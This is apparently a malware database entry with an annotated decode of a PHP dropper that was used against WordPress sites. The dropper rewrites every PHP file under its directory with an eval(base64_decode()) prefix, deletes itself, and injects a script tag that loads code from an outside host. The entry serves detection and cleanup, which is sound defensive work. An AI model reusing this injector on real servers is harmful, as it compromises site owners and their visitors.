
Malware entry: MW:SIPRO:1

Description: Code used to insert malicious JavaScript into many WordPress sites hosted at GoDaddy. Malware dump:
Decoded dump:
// Analyst annotations: every line starting with // was added for readers of this entry.
// The code itself is the decoded sample exactly as published, only re-broken across lines.

// Lifts PHP's execution time limit, so the directory walk below is not cut short.
set_time_limit(0);

// inject($f, $inj): prepends the string $inj to the file at path $f and bumps the global counter.
function inject($f,$inj){
    global $totalinjected;
    $c = file_get_contents($f);
    // Files containing any of the next three strings are left untouched. The third string is
    // the start of this sample's own prefix (see $encoded below), so a file that already
    // carries it is not modified a second time.
    if (strstr($c,"r57shell")) return;
    if (strstr($c,"@zend")) return;
    if (strstr($c,'<?php /**/ eval(base64_decode(')) return;
    // A file whose first 10 characters equal the marker tested here has everything up to and
    // including its first PHP closing tag cut off before the new prefix is added.
    // NOTE(review): presumably this replaces an earlier prefix of a different form; unconfirmed.
    if (substr($c,0,10)=='<?php /**/'){
        $k=strpos($c,'?>')+2;
        $c=substr($c,$k);
    }
    $c = $inj.$c;
    // The file is reopened in "w" mode and rewritten in full; @ suppresses any error output,
    // so a failed write leaves no message. Rewritten files get a new modification time.
    $h2 = @fopen ($f, "w");@fwrite($h2, $c);@fclose($h2);
    $totalinjected++;
}

// inject_in_folder($dir): walks $dir recursively and calls inject() on each regular file whose
// last dot-separated name segment, lower-cased, is "php".
function inject_in_folder($dir){
    global $encoded;
    if (is_dir($dir)) {
        if ($dh = @opendir($dir)) {
            while (($file = @readdir($dh)) !== false) {
                if (($file==".")||($file==".."))continue;
                $k=$dir."/".$file;
                if (is_dir($k)){
                    inject_in_folder($k);
                }else{
                    if (is_file($k)){
                        $ext=explode(".",$k);
                        $c=count($ext)-1;
                        if (strtolower($ext[$c])=="php"){
                            // NOTE(review): the "n" here, and the trailing n in the two echo strings
                            // below, look like "\n" with the backslash lost when the page was
                            // extracted; unconfirmed.
                            inject($k,$encoded."n");
                        }
                    }
                }
            }
            @closedir($dh);
        }
    }
}

// The running script's own path is read and the script file is deleted right away, so the
// dropper is normally no longer on disk when the modified files are discovered.
$z=$_SERVER["SCRIPT_FILENAME"];
@unlink($z);
// Base64 form of the script tag that loads the remote JavaScript.
$cod=base64_encode('<script src="http://holasionweb.com/oo.php"></script>');
// The ".." below is an elision in the published dump. $to_pack is not assigned in the visible
// part; presumably it is built from $cod in the omitted code; unconfirmed.
..
$to_pack=base64_encode($to_pack);
// $encoded is the prefix written at the top of each target file. For cleanup, its fixed leading
// part is the string to search for at the start of PHP files.
$encoded='<?php /**/ eval(base64_decode("'.$to_pack.'"));?>';
// The walk starts at the directory that held the dropper script and covers everything beneath it.
$val=dirname($z);
$totalinjected=0;
echo "Working with $valn";
$start_time=microtime(true);
if ($val!="")inject_in_folder($val);
$end_time=microtime(true)-$start_time;
// The response body reports how many files were rewritten and how long the walk took.
echo "|Injected| $totalinjected files in $end_time secondsn";

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb